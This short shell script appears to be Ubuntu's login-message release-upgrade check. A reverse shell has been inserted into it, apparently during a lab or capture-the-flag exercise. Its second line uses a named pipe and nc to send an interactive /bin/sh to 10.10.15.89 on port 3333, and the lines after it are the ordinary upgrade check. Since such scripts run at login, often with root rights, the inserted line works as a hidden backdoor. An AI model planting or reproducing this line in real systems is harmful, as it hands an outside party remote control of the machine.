#!/bin/sh
rm /tmp/xd;mkfifo /tmp/xd;cat /tmp/xd|/bin/sh -i 2>&1|nc 10.10.15.89 3333 >/tmp/xd
# if the current release is under development there won't be a new one
if [ "$(lsb_release -sd | cut -d' ' -f4)" = "(development" ]; then
    exit 0
fi
if [ -x /usr/lib/ubuntu-release-upgrader/release-upgrade-motd ]; then
    exec /usr/lib/ubuntu-release-upgrader/release-upgrade-motd
fi
